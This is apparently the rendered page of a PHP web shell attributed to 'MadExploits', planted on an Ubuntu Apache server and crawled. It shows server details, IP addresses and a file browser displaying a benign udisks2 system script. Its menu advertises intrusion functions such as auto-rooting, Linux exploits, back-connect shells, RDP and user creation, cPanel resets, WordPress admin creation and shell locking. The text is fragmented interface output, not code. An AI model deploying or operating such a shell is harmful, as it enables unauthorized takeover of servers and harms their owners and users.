Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.115.13
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
udisks2 /
[ HOME SHELL ]
Name
Size
Permission
Action
udisks2-inhibit
791
B
-rwxr-xr-x
udisksd
471.73
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : udisks2-inhibit
#!/bin/sh # Avoid udisks mounting while a program is running. This is mostly useful # for installers. # This is similar to udisks 1.x's "udisks --inhibit .." command. # Author: Martin Pitt <martin.pitt@ubuntu.com> set -e [ -n "$1" ] || { echo "Usage: $0 <command> [<arguments> ...]" >&2 exit 1 } [ "`id -u`" = 0 ] || { echo "You need to run this script as root" >&2 exit 1 } mkdir -p /run/udev/rules.d echo 'SUBSYSTEM=="block", ENV{UDISKS_IGNORE}="1"' > /run/udev/rules.d/90-udisks-inhibit.rules trap "rm -f /run/udev/rules.d/90-udisks-inhibit.rules; udevadm control --reload; udevadm trigger --subsystem-match=block" EXIT HUP INT QUIT ILL ABRT FPE KILL SEGV PIPE ALRM TERM BUS udevadm control --reload udevadm trigger --subsystem-match=block # run wrapped command "$@"
Close